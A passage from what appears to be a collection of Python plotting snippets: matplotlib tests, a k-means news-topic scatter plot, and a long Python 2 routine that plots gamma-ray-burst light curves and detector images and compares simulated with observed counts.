fontsize=14)\n time.sleep(1)\n time.sleep(0.2) # pause between frames\n\n implementation = {'ic': version, 'inner': version, 'bc': version}\n nx = 40; ny = 40; tstop = 20 # tstop = 700\n print 'test_plot1:', f, bc, I2\n dt, t_ic, t_inner, t_bc = \\\n solver(I2, f, c, bc, Lx, Ly, nx, ny, 0, tstop,\n user_action=action, implementation=implementation)\n print 'time ic: %s, time scheme: %s, time bc: %s' % (t_ic, t_inner, t_bc)\n time.sleep(3)", "def plot_graph(self) -> None:", "def test_bore_smoke():\n gef = read_bore(os.path.join(BasePath, \"../test_files/example_bore.gef\"))\n axes = plotting.plot_bore(gef)\n assert isinstance(axes, plt.Axes)", "def setUp(self):\n\n self.plot = spotify_analysis.Plot(\"data/test.csv\")", "def test_plot_images(self):\n save_file(self.quart.plot_images)", "def test_get_run_plot(self):\n plot = plots.get_run_plot('h', NOMINAL_RUN)\n self.assertEqual(plot['data']['title'], 'h_nom')", "def test_exercise_1():\n a, b = 5, 0\n fvals = []\n grid = np.linspace(-3, 4)\n for value in grid:\n fvals.append(get_test_function(value, a, b))\n plt.plot(grid, fvals)", "def testing():\n\n\n valueDumpFile1 = open(\"datasets/bbc/politics.pickle\",\"rb\")\n #pickle.dump(plot1,valueDumpFile1)\n 
plot1=pickle.load(valueDumpFile1)\n valueDumpFile1 = open(\"datasets/bbc/business.pickle\",\"rb\")\n #pickle.dump(plot2,valueDumpFile1)\n plot2=pickle.load(valueDumpFile1)\n valueDumpFile1 = open(\"datasets/bbc/tech.pickle\",\"rb\")\n #pickle.dump(plot3,valueDumpFile1)\n plot3=pickle.load(valueDumpFile1)\n valueDumpFile1 = open(\"datasets/bbc/entertainment.pickle\",\"rb\")\n #pickle.dump(plot4,valueDumpFile1)\n plot4=pickle.load(valueDumpFile1)\n valueDumpFile1 = open(\"datasets/bbc/sport.pickle\", \"rb\")\n #pickle.dump(plot5, valueDumpFile1)\n plot5=pickle.load(valueDumpFile1)\n total = []\n for d in plot1:\n total.append(d)\n for d in plot2:\n total.append(d)\n\n for d in plot3:\n total.append(d)\n for d in plot4:\n total.append(d)\n\n for d in plot5:\n total.append(d)\n fig = plt.figure()\n ax = plt.subplot(111)\n\n #ax.scatter(plot1[:,0],plot1[:,1],s=5,linewidths=5)\n line1=ax.plot(plot1[:,0],plot1[:,1],\"bo\",label=\"Politics\")\n line2=ax.plot(plot2[:,0],plot2[:,1],\"ro\",label='Business')\n line3=ax.plot(plot3[:,0],plot3[:,1],\"go\",label=\"Tech\")\n line4=plt.plot(plot4[:,0],plot4[:,1],\"yo\",label=\"Entertainment\")\n line4 = plt.plot(plot5[:, 0], plot5[:, 1], \"ko\", label=\"sport\")\n ax.legend()\n fig.add_subplot(ax)\n #fig.add_subplot(aq)\n print(total)\n plt.show()\n\n\n \"\"\"\n temp=open(\"datasets/bbc/002.txt\",\"r\")\n plotValue,correspondingWord=im.plotDocumentWords(temp)\n plotValue= np.array(plotValue)\n \"\"\"\n colors = 100*[\"r\",\"g\",\"b\",\"c\",\"k\",\"l\",\"p\"]\n (classifications,centroids)= kMeans.execute_kmeans(total, k=5, showPlot=True, plotRef=plt)\n x=[]\n y=[]\n \"\"\"\n count = 0\n for centroid in centroids:\n plt.scatter(centroids[centroid][0], centroids[centroid][1], marker=\"o\", color=colors[count], s=100,\n linewidths=5)\n count = count + 1\n \n for classification in classifications:\n color = colors[classification]\n if len(classifications[classification]) > 0:\n for featureSet in classifications[classification]:\n plt.scatter(featureSet[0], featureSet[1], marker=\"x\", color=color, s=100, linewidths=5)\n \n \n for k in plotValue:\n x.append(k[0])\n y.append(k[1])\n #plt.scatter(x,y,linewidths=2,s=5)\n for i in range(len(correspondingWord)):\n xy=(x[i],y[i])\n plt.annotate(correspondingWord[i],xy)\n \"\"\"\n plt.show()", "def main():\r\n plot = Plotter(0.5, 1.2)\r\n plot.plot_func()", "def test_x(self):\n g = gca()\n lines = g.get_lines() \n self.assertEquals(lines[0].get_xdata().tolist(), [3, 5, 5, 3, 3])", "def test_render_xy_plot():\n gdpinfo = {\n \"gdpfile\": \"isp_gdp.csv\",\n \"separator\": \",\",\n \"quote\": '\"',\n \"min_year\": 1960,\n \"max_year\": 2015,\n \"country_name\": \"Country Name\",\n \"country_code\": \"Country Code\"\n }\n\n render_xy_plot(gdpinfo, [], \"isp_gdp_xy_none.svg\")\n render_xy_plot(gdpinfo, [\"China\"], \"isp_gdp_xy_china.svg\")\n render_xy_plot(gdpinfo, [\"United Kingdom\", \"United States\"],\n \"isp_gdp_xy_uk+usa.svg\")\n render_xy_plot(gdpinfo, [\"India\", \"China\", \"United Kingdom\", \"United States\", \"Aruba\", \"Andorra\", \"Angola\", \"Afghanistan\", \"Albania\"], \"isp_gdp_xy_countries.svg\")", "def test_plot():\n fig = plt.figure()\n ax = fig.add_subplot(projection='ternary')\n tn0, tn1, tn2 = get_spiral()\n ax.plot(tn0, tn1, tn2)", "def test_screenshot_then_show():\n vpl.figure()\n vpl.quick_test_plot()\n vpl.screenshot_fig()\n vpl.show()", "def test_line_plot(self):\n clf()\n filename = 'lines_plot.png'\n N = 10\n lines = GeoSeries([LineString([(0, i), (9, i)]) for i in xrange(N)])\n ax = 
lines.plot()\n self._compare_images(ax=ax, filename=filename)", "def test_link_axes(self):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n splt = SEGYPlotter(ax, self.segy)\n # should add one artist to our axes\n splt.plot_wiggles(wiggle_traces=True)\n self.assertEqual(len(splt.ACTIVE_LINES['wiggle_traces']), 1)\n self.assertTrue('wiggle_traces' not in splt.INACTIVE_LINES)\n self.assertEqual(len(ax.lines), 1)\n # should remove one artist to our axes\n splt.plot_wiggles(wiggle_traces=False)\n self.assertTrue('wiggle_traces' not in splt.ACTIVE_LINES)\n self.assertEqual(len(splt.INACTIVE_LINES['wiggle_traces']), 1)\n self.assertEqual(len(ax.lines), 0)", "def test_plot_npy(self, script_runner: ScriptRunner, tmp_path: Path) -> None:\n outfile = tmp_path.joinpath(\"projection.png\")\n logfile = tmp_path.joinpath(\"plot.log\")\n result = script_runner.run(\n \"qaa\",\n \"plot\",\n \"-i\",\n PROJNP,\n \"-o\",\n outfile.as_posix(),\n \"-l\",\n logfile.as_posix(),\n \"--pca\",\n \"--verbose\",\n )\n assert result.success\n assert logfile.exists()\n assert outfile.exists()\n assert outfile.stat().st_size > 0", "def plot_vis_test(plotfile,pdf_file):\n\t# First some parameters looked up from configfile---------------------------------\n\t\n\tgrbdir = runconf['l2file'][0:10]\n\tpre_tstart = runconf['bkg1start']\n\tpre_tend = runconf['bkg1end']\n\ttrigtime = runconf['trigtime']\n\tgrb_tstart = runconf['transtart']\n\tgrb_tend = runconf['tranend']\n\tpost_tstart = runconf['bkg2start']\n\tpost_tend = runconf['bkg2end']\n\tt_src = grb_tend - grb_tstart \n\tt_tot = (pre_tend-pre_tstart)+(post_tend-post_tstart)\n\tra_tran = runconf['ra']\n\tdec_tran = runconf['dec']\n\tlc_bin = runconf['lc_bin']\n\talpha = runconf['alpha']\n\tbeta = runconf['beta']\n\tE0 = runconf['E0']\n\tA = runconf['A']\n\tsim_scale = t_src\n\tpixbin = int(runconf['pixsize'])\n\tcomp_bin = int(runconf['comp_bin'])\n\ttyp = runconf['typ']\n\n\t# Calling txy to calculate thetax thetay and the coordinates----------------------\n\t\n\tthetax,thetay,x,y,z,t = txy(runconf['mkffile'], trigtime, ra_tran, dec_tran)\n\t\n\t# Plot the 3d visualisation for the position of the transient---------------------\n\tplt.figure()\n\tfig = visualize_3d(grbdir,x,y,z, t, thetax, thetay, grbdir)\t\n\tpdf_file.savefig(fig)\n\t\n\t# Plotting the lightcurves for the four quadrants---------------------------------\n\tfig = plt.figure()\n\tclean_file = fits.open(runconf['infile'])\n\tplt.title('Light curves for '+grbdir + \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay))\n\t\n\tquad0 = clean_file[1].data\n\tdata0,bin_edge = np.histogram(quad0['time'], bins=np.arange(quad0['time'][0],quad0['time'][-1],lc_bin))\n\tplt.plot((bin_edge[:-1]+bin_edge[1:])/2.0,data0,label='Quad 0',lw=0.7)\n quad1 = clean_file[2].data\n\tdata1,bin_edge = np.histogram(quad1['time'], bins=np.arange(quad1['time'][0],quad1['time'][-1],lc_bin))\n\tplt.plot((bin_edge[:-1]+bin_edge[1:])/2.0,data1,label='Quad 1',lw=0.7) \n\tquad2 = clean_file[3].data\n\tdata2,bin_edge = np.histogram(quad2['time'], bins=np.arange(quad2['time'][0],quad2['time'][-1],lc_bin))\n\tplt.plot((bin_edge[:-1]+bin_edge[1:])/2.0,data2,label='Quad 2',lw=0.7)\n quad3 = clean_file[4].data\n data3,bin_edge = np.histogram(quad3['time'], bins=np.arange(quad3['time'][0],quad3['time'][-1],lc_bin))\n plt.plot((bin_edge[:-1]+bin_edge[1:])/2.0,data3,label='Quad 
3',lw=0.7)\n\tplt.axvspan(grb_tstart,grb_tend,color='blue',alpha=0.1,label='GRB')\n\tplt.axvspan(pre_tstart,pre_tend,color='orange',alpha=0.2)\n\tplt.axvspan(post_tstart,post_tend,color='orange',alpha=0.2,label='Background')\n\tplt.legend(prop={'size':6})\n\tplt.xlim(pre_tstart-100,post_tend+100)\n\tpdf_file.savefig(fig)\n\t\n\t# Calling the sim_dph--------------------------------------------------------------\n\t\n\tgrb_flat,bkgd_flat,grb_dph,bkgd_dph,t_src,t_total = data_bkgd_image(grbdir,pre_tstart,pre_tend,grb_tstart,grb_tend,post_tstart,post_tend)\n\n\tsim_flat,sim_dph,badpix_mask,sim_err_dph = simulated_dph(grbdir,typ,t_src,alpha,beta,E0,A)\n\n\tsrc_dph = grb_dph-bkgd_dph*t_src/t_tot\n\n print \"Total counts in simulated dph: \",(sim_dph).sum()\n print \"Total counts after badpix mask is applied: \",(sim_dph*badpix_mask).sum()\n\tprint \"Excess counts in badpix masked src dph: \",(src_dph*badpix_mask).sum()\n \n\t# Plotting the DPHs before badpix correction---------------------------------------\n\t\n\tf,((ax1,ax2),(ax3,ax4)) = plt.subplots(2,2)\n\tplt.suptitle('DPHs before badpix correction for '+grbdir + \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay))\n \t# Sim\n\tim = ax3.imshow(sim_dph,interpolation='none')\n\tax3.set_title('Sim DPH',fontsize=8)\n\tax3.set_xlim(-1,128 - 0.5)\n\tax3.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax3.spines['left'].set_position(('data',-0.5))\n\tax3.set_yticklabels([])\n\tax3.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax3,fraction=0.046, pad=0.04)\n\t\n\t # Source \n\tim = ax4.imshow(src_dph,interpolation='none',vmin=0)\n\tax4.set_title('Src DPH (bkg subtracted)',fontsize=8)\n\tax4.set_xlim(-1,128 -0.5)\n\tax4.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax4.spines['left'].set_position(('data',-0.5))\n\tax4.set_yticklabels([])\n\tax4.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax4,fraction=0.046, pad=0.04)\n\n \t# Source + Background\n\tim = ax1.imshow(grb_dph,interpolation='none')\n\tax1.set_title('Src + Bkg DPH',fontsize=8)\n\tax1.set_xlim(-1,128 -0.5)\n\tax1.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax1.spines['left'].set_position(('data',-0.5))\n\tax1.set_yticklabels([])\n\tax1.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax1,fraction=0.046, pad=0.04)\n\n \t# Background\n\tim = ax2.imshow(bkgd_dph*t_src/t_total,interpolation='none')\n\tax2.set_title('Bkg DPH',fontsize=8)\n\tax2.set_xlim(-1,128 -0.5)\n\tax2.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax2.spines['left'].set_position(('data',-0.5))\n\tax2.set_yticklabels([])\n\tax2.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax2,fraction=0.046, pad=0.04)\n\tf.set_size_inches([6.5,6.5])\n\tpdf_file.savefig(f) # saves the current figure into a pdf_file page\n\t\n\t# Plotting the Badpix mask---------------------------------------------\n\n\tfig = plt.figure()\n\tax = plt.subplot(111)\n\tplt.title('Badpix Mask for '+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay))\n\tim = ax.imshow(badpix_mask,interpolation='none')\n\tax.set_xlim(-9,128 -0.5)\n\tax.axvline(x=-5.,ymin=0,ymax=64,linewidth=5,color='k')\n\tax.spines['left'].set_position(('data',-0.5))\n\tax.xaxis.set_ticks(np.arange(0,128,16))\n\tax.yaxis.set_ticks(np.arange(0,128,16))\n\tfig.colorbar(im,ax=ax,fraction=0.046, pad=0.04)\n\t\n\tpdf_file.savefig(fig) # saves the current figure into a pdf_file page\n\n\t# Plotting badpix masked 
graphs--------------------------------------------\n\tf,((ax1,ax2),(ax3,ax4)) = plt.subplots(2,2)\n\tplt.suptitle('DPHs after badpix correction for '+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay))\n \t# Sim\n\tim = ax3.imshow(sim_dph*badpix_mask,interpolation='none')\n\tax3.set_title('Sim DPH',fontsize=8)\n\tax3.set_xlim(-1,128 -0.5)\n\tax3.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax3.spines['left'].set_position(('data',-0.5))\n\tax3.set_yticklabels([])\n\tax3.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax3,fraction=0.046, pad=0.04)\n\n\t # Source \n\tim = ax4.imshow(src_dph*badpix_mask,interpolation='none',vmin=0)\n\tax4.set_title('Src DPH (bkg subtracted)',fontsize=8)\n\tax4.set_xlim(-1,128 -0.5)\n\tax4.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax4.spines['left'].set_position(('data',-0.5))\n\tax4.set_yticklabels([])\n\tax4.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax4,fraction=0.046, pad=0.04)\n\n\t # Source + Background\n\tim = ax1.imshow(grb_dph*badpix_mask,interpolation='none')\n\tax1.set_title('Src + Bkg DPH',fontsize=8)\n\tax1.set_xlim(-1,128 -0.5)\n\tax1.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax1.spines['left'].set_position(('data',-0.5))\n\tax1.set_yticklabels([])\n\tax1.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax1,fraction=0.046, pad=0.04)\n\t\n\t # Background\n\tim = ax2.imshow(bkgd_dph*badpix_mask*t_src/t_total,interpolation='none')\n\tax2.set_title('Bkg DPH',fontsize=8)\n\tax2.set_xlim(-1,128 -0.5)\n\tax2.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax2.spines['left'].set_position(('data',-0.5))\n\tax2.set_yticklabels([])\n\tax2.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax2,fraction=0.046, pad=0.04)\n\tf.set_size_inches([6.5,6.5])\n\tpdf_file.savefig(f) # saves the current figure into a pdf_file page\n\n\t# Plotting badpix masked graphs (Binned) ----------------------------------------------------\n\tfor p in [4,8,16]:\n\t\tf,((ax1,ax2),(ax3,ax4)) = plt.subplots(2,2)\n\t\tplt.suptitle('DPHs after badpix correction for '+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay)+ \"pixsize=\"+str(p))\n\t\t # Sim\n\t\tim = ax3.imshow(resample(sim_dph*badpix_mask,p),interpolation='none')\n\t\tax3.set_title('Sim DPH',fontsize=8)\n\t\tax3.set_xlim(-1,128/p -0.5)\n\t\tax3.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\t\tax3.spines['left'].set_position(('data',-0.5))\n\t\tax3.set_yticklabels([])\n\t\tax3.xaxis.set_ticks(np.arange(0,(128/p),16/p))\n\t\tax3.set_xticklabels(np.arange(0,128,16))\n\t\tf.colorbar(im,ax=ax3,fraction=0.046, pad=0.04)\n\t\t\n\t\t # Source \n\t\tim = ax4.imshow(resample(src_dph*badpix_mask,p),interpolation='none',vmin=0)\n\t\tax4.set_title('Src DPH (bkg subtracted)',fontsize=8)\n\t\tax4.set_xlim(-1,128/p -0.5)\n\t\tax4.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\t\tax4.spines['left'].set_position(('data',-0.5))\n\t\tax4.set_yticklabels([])\n ax4.xaxis.set_ticks(np.arange(0,(128/p),16/p))\n ax4.set_xticklabels(np.arange(0,128,16))\t\t\n\t\tf.colorbar(im,ax=ax4,fraction=0.046, pad=0.04)\n\t\t\n\t\t # Source + Background\n\t\tim = ax1.imshow(resample(grb_dph*badpix_mask,p),interpolation='none')\n\t\tax1.set_title('Src + Bkg DPH',fontsize=10)\n\t\tax1.set_xlim(-1,128/p -0.5)\n\t\tax1.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\t\tax1.spines['left'].set_position(('data',-0.5))\n\t\tax1.set_yticklabels([])\n 
ax1.xaxis.set_ticks(np.arange(0,(128/p),16/p))\n ax1.set_xticklabels(np.arange(0,128,16))\t\t\n\t\tf.colorbar(im,ax=ax1,fraction=0.046, pad=0.04)\n\t\t\n\t\t # Background\n\t\tim = ax2.imshow(resample(bkgd_dph*badpix_mask*t_src/t_total,p),interpolation='none')\n\t\tax2.set_title('Bkg DPH',fontsize=8)\n\t\tax2.set_xlim(-1,128/p -0.5)\n\t\tax2.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\t\tax2.spines['left'].set_position(('data',-0.5))\n\t\tax2.set_yticklabels([])\n ax2.xaxis.set_ticks(np.arange(0,(128/p),16/p))\n ax2.set_xticklabels(np.arange(0,128,16))\t\t\n\t\tf.colorbar(im,ax=ax2,fraction=0.046, pad=0.04)\n\t\tf.set_size_inches([6.5,6.5])\n\t\t\n\t\tpdf_file.savefig(f) # saves the current figure into a pdf_file page\n\n\n\t# Plotting the comparison graphs with equal bins ---------------------------------------\n\tprint \"No. of pixels with zero counts in sim_dph: \",sim_dph[sim_dph==0].size\n\tprint \"No. of pixels with zero counts in grb_dph(no bkg subtration): \",grb_dph[grb_dph==0].size\n\t\n\t# Generating the array for module number ------------------------------------------------\n\tA = ['A'+str(i) for i in range(16)]\n\tB = np.flip(['B'+str(i) for i in range(16)],0)\n\tC = np.flip(['C'+str(i) for i in range(16)],0)\n\tD = ['D'+str(i) for i in range(16)]\n\tquad_a = np.reshape(A,(4,4))\n\tquad_b = np.reshape(B,(4,4))\n\tquad_c = np.reshape(C,(4,4))\n\tquad_d = np.reshape(D,(4,4))\n\tMod_arr = np.ndarray((8,8),dtype='|S3')\n\tMod_arr[:4,:4] = quad_a\n\tMod_arr[:4,4:] = quad_b\n\tMod_arr[4:,4:] = quad_c\n\tMod_arr[4:,:4] = quad_d\n\tMod_names = Mod_arr.flatten()\n\t#print \"Module name array : \",Mod_names\n\t#-----------------------------------------------------------------------------------------\n\t\t\n\tsim_dph = sim_dph*badpix_mask\n\tsim_err_dph = sim_err_dph*badpix_mask\n grb_dph = grb_dph*badpix_mask\n bkgd_dph = bkgd_dph*badpix_mask\n\tgrb_err_dph = np.sqrt(grb_dph)*badpix_mask\n\tbkgd_err_dph = np.sqrt(bkgd_dph)*badpix_mask\n\n\tsim_bin = resample(sim_dph,pixbin)\n\tsim_err_bin = np.sqrt(resample(sim_err_dph**2,pixbin))\t\n\tgrb_bin = resample(grb_dph,pixbin)\n\tbkgd_bin = resample(bkgd_dph,pixbin)\n\tgrb_err_bin = np.sqrt(resample(grb_err_dph,pixbin))\t\n\tbkgd_err_bin = np.sqrt(resample(bkgd_err_dph,pixbin))\t\n\n\tsim_flat_bin = sim_bin.flatten()\n\tsim_err_flat_bin = sim_err_bin.flatten()\n\tgrb_flat_bin = grb_bin.flatten()\n\tbkgd_flat_bin = bkgd_bin.flatten()\n\tgrb_err_flat_bin = grb_err_bin.flatten()\n\tbkgd_err_flat_bin = bkgd_err_bin.flatten()\n\t\n\n\t # Defining model background and data\n\tmodel = sim_flat_bin\n\tmodel_copy = np.copy(model)\n\tbkgd = bkgd_flat_bin*t_src/t_tot\n\tsrc = grb_flat_bin\n\t\n\tdata = src - bkgd\n\tdata_copy = np.copy(data)\n\t\n\terr_src = grb_err_flat_bin\n\terr_bkgd = bkgd_err_flat_bin\n\terr_model = sim_err_flat_bin\n\terr_model_copy = np.copy(err_model)\n\terr_data = np.sqrt(((err_src)**2) + ((err_bkgd)**2)*(t_src/t_total)**2)\n\terr_data_copy = np.copy(err_data)\n\t\n\tratio = data/model\n\terr_ratio = ratio*np.sqrt(((err_data/data)**2) + ((err_model/model)**2))\n\t\n\tchi_sq = (((model-data)**2)/((err_model)**2 + (err_data)**2)).sum()\n\t\n\t # PLotting the comparison plots\n\tf,(ax1,ax2) = plt.subplots(2,gridspec_kw={'height_ratios':[2,1]},sharex='row')\n\t\n\tax1.set_title(\"Comparison between simulated and real data for \"+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} 
$\\chi^2$={c:0.1f}\".format(tx=thetax,ty=thetay,c=chi_sq))\n\tax1.errorbar(np.arange(0,(len(data))),data,yerr=err_data,fmt='.',markersize=2,label=\"Data\",elinewidth=0.5)\n\tax1.errorbar(np.arange(0,(len(model))),model,yerr=err_model,fmt='.',markersize=2,label=\"Simulation\",elinewidth=0.5)\n\tax1.legend()\n ax1.xaxis.set_ticks(np.arange(0,len(data)))\n\tax1.set_ylabel('Counts')\n\tax1.xaxis.grid(linewidth=0.5,alpha=0.3)\n ax1.set_xticklabels(Mod_names,rotation=90,fontsize=5)\n\n\tax2.errorbar(np.arange(0,(len(ratio))),ratio,yerr=err_ratio,fmt='.',markersize=2,label=\"Ratio = Data/Model\",elinewidth=0.5)\n\tax2.xaxis.set_ticks(np.arange(0,len(data)))\n ax2.set_xticklabels(Mod_names,rotation=90,fontsize=5)\n ax2.yaxis.set_ticks(np.arange(int(min(ratio-err_ratio)-1),int(max(ratio+err_ratio)+2),1))\n\tax2.tick_params(labelsize=5)\n\tax2.axhline(y=1,linewidth=0.5,color='k')\n\tax2.legend()\n\tax2.set_xlabel('CZT Modules')\n\tax2.set_ylabel('Ratio of counts')\n\tax2.xaxis.grid(linewidth=0.5,alpha=0.3)\n\tplt.tight_layout(h_pad=0.0)\n\tf.set_size_inches([6.5,10])\n\tpdf_file.savefig(f,orientation='portrait') # saves the current figure into a pdf_file page\n\n\t# Plotting comparison graphs with random binning------------------------------\n\t\n sim_flat = sim_dph.flatten()\n\tsim_err_flat = sim_err_dph.flatten()\n grb_flat = grb_dph.flatten()\n bkgd_flat = bkgd_dph.flatten()\n\tsrc_flat = src_dph.flatten()\n\t\n\torder = np.random.permutation(np.arange(0,len(sim_flat)))\n\t\n sim_flat = sim_flat[order]\n\tsim_err_flat = sim_err_flat[order]\n\tgrb_flat = grb_flat[order]\n\tbkgd_flat = bkgd_flat[order]\n\tsrc_flat = src_flat[order]\n\t\n\tprint \"No. of pixels with zero counts in sim_flat: \",sim_flat[sim_flat==0].size\n\tprint \"No. of pixels with zero counts in src_flat: \",src_flat[src_flat==0].size\n\t\n\tbins = np.array(np.sort(np.random.uniform(0,1,comp_bin)*len(sim_flat)),dtype=np.int64)\n\tx = np.zeros(len(bins)+2,dtype=np.int64)\n\tx[0] = 0\n\tx[-1] = len(sim_flat)\n\tx[1:-1] = bins\n\t\n\t#print \"The bin edges: \",x # ---------------------------------------------------------------\n\t\n\tsim_flat_bin = np.array([sim_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tsim_err_flat_bin = np.sqrt(np.array([(sim_err_flat[x[i]:x[i+1]]**2).sum() for i in range(comp_bin+1)]))\n\tgrb_flat_bin = np.array([grb_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tgrb_err_flat_bin = np.sqrt(np.array([grb_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)]))\n\tbkgd_flat_bin = np.array([bkgd_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tbkgd_err_flat_bin = np.sqrt(np.array([bkgd_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)]))\n\tsrc_flat_bin = np.array([src_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\t\n\tprint \"Total sim_flat_bin : \",sim_flat_bin.sum() #-----------------------------------------\n\t#print \" Max(cumsum) : \",max(np.cumsum(sim_flat)) #-----------------------------------------\n\n # Defining model background and data\n model = sim_flat_bin #avg_flat_bin\n bkgd = bkgd_flat_bin*t_src/t_tot\n src = grb_flat_bin\n\t\n data = src - bkgd\n\n err_src = np.sqrt(src)\n err_bkgd = np.sqrt(bkgd_flat_bin)\n err_model = sim_err_flat_bin\n err_data = np.sqrt(((err_src)**2) + ((err_bkgd)**2)*(t_src/t_total)**2)\n\t\n\tchi_sq_new = (((model-data)**2)/((err_model)**2 + (err_data)**2)).sum()\n # PLotting the comparison plots\n fig = plt.figure()\n plt.title(\"Comparison between simulated and real data for \"+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and 
$\\theta_y$={ty:0.1f} $\\chi^2$={c:0.1f} \".format(tx=thetax,ty=thetay,c=chi_sq_new))\n plt.errorbar(np.arange(0,(len(data))),data,yerr=err_data,fmt='.',markersize=2,label=\"Data\",elinewidth=0.5)\n plt.errorbar(np.arange(0,(len(model))),model,yerr=err_model,fmt='.',markersize=2,label=\"Simulation\",elinewidth=0.5)\n plt.ylabel('Counts')\n\tplt.xlabel('Random Bins')\n\tplt.xticks(np.arange(0,(len(data)),1))\n\tplt.legend()\n pdf_file.savefig(fig) #saves the current figure into a pdf_file page\n\n\t# Plotting observed vs predicted counts------------------------------------------------------\n\n\tfig = plt.figure()\n\tplt.title(grbdir + r\" : Observed vs Predicted counts with $\\chi^2$={cs:0.1f}\".format(cs=chi_sq))\n\tplt.errorbar(model_copy,data_copy,xerr=err_model_copy,yerr=err_data_copy,fmt='g.',markersize=2,elinewidth=0.5)\n\tfor i in range(len(model_copy)):\n\t\tplt.text(model_copy[i],data_copy[i],Mod_names[i],fontsize=5)\n\tplt.plot(np.arange(-1000,1000),np.arange(-1000,1000),'k',linewidth=0.5)\n\tplt.xlim(min(model_copy)-5,max(model_copy)+5)\n\tplt.ylim(min(data_copy)-5,max(data_copy)+5)\n\tplt.xlabel('Predicted Counts')\n\tplt.ylabel('Observed Counts')\n\tplt.legend()\n\tplt.grid()\n\tpdf_file.savefig(fig)\n\n\t# Scaling the model using curve fit =============================================================== \n\t\n\tparam,pcov = curve_fit(fit_line_int,model_copy,data_copy)\n\tscaling = param[0]\n\tintercept = param[1]\n\t\n\t# Plotting the scaled plots ===================================================================\n\t# Plotting the comparison graphs with equal bins ---------------------------------------\n\n\tsim_dph = sim_dph*badpix_mask\n\tsim_err_dph = sim_err_dph*badpix_mask\n grb_dph = grb_dph*badpix_mask\n bkgd_dph = bkgd_dph*badpix_mask\n\tgrb_err_dph = np.sqrt(grb_dph)*badpix_mask\n\tbkgd_err_dph = np.sqrt(bkgd_dph)*badpix_mask\n\n\tsim_bin = resample(sim_dph,pixbin)\n\tsim_err_bin = np.sqrt(resample(sim_err_dph**2,pixbin))\t\n\tgrb_bin = resample(grb_dph,pixbin)\n\tbkgd_bin = resample(bkgd_dph,pixbin)\n\tgrb_err_bin = np.sqrt(resample(grb_err_dph,pixbin))\t\n\tbkgd_err_bin = np.sqrt(resample(bkgd_err_dph,pixbin))\t\n\n\tsim_flat_bin = sim_bin.flatten()\n\tsim_err_flat_bin = sim_err_bin.flatten()\n\tgrb_flat_bin = grb_bin.flatten()\n\tbkgd_flat_bin = bkgd_bin.flatten()\n\tgrb_err_flat_bin = grb_err_bin.flatten()\n\tbkgd_err_flat_bin = bkgd_err_bin.flatten()\n\t\n\n\t # Defining model background and data\n\t#model = sim_flat_bin*scaling\n\tmodel = sim_flat_bin*scaling + intercept\n\tbkgd = bkgd_flat_bin*t_src/t_tot\n\tsrc = grb_flat_bin\n\t\n\tdata = src - bkgd\n\t\n\terr_src = grb_err_flat_bin\n\terr_bkgd = bkgd_err_flat_bin\n\t#err_model = sim_err_flat_bin*scaling\n\terr_model = sim_err_flat_bin*scaling\n\terr_data = np.sqrt(((err_src)**2) + ((err_bkgd)**2)*(t_src/t_total)**2)\n\t\n\tratio = data/model\n\terr_ratio = ratio*np.sqrt(((err_data/data)**2) + ((err_model/model)**2))\n\t\n\tchi_sq = (((model-data)**2)/((err_model)**2 + (err_data)**2)).sum()\n\t\n\t # PLotting the comparison plots\n\tf,(ax1,ax2) = plt.subplots(2,gridspec_kw={'height_ratios':[2,1]},sharex='row')\n\t\n\tax1.set_title(\"Comparison between simulated (scaled) and real data for \"+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} $\\chi^2$={c:0.1f} 
